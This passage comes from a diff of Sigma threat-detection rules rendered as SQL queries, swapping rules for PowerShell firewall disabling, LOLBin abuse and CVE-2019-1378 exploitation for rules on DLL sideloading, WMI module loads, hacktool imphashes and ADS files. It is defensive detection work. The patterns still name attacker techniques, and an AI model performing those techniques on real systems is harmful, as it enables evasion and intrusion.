LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_susp_copy_browser_data.yml" + "filename": "image_load_abusing_azure_browser_sso.yml" }, { - "title": "Windows Firewall Disabled via PowerShell", - "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "status": "experimental", - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "author": "Tim Rauch", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_disable_firewall.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Code Execution via Pcwutl.dll", - "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", - "status": "test", - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "author": "Julia Fomina, oscd.community", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Use of Program Compatibility Troubleshooter Helper" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pcwutl.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "title": "WMI Modules Loaded", + "id": "671bb7e3-a020-4824-a00e-2ee5b55f385e", "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects non wmiprvse loading WMI modules", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WmiApRpl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WMINet\\_Utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiApSrv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DeviceCensus.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ngentask.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\wbem\\\\WMIADAP.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\unsecapp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nvcontainer.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "image_load_wmi_module_load.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "status": "experimental", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Creation Of a Suspicious ADS File Outside a Browser Download", + "id": "573df571-a223-43bc-846e-3f98da481eca", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.009" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE 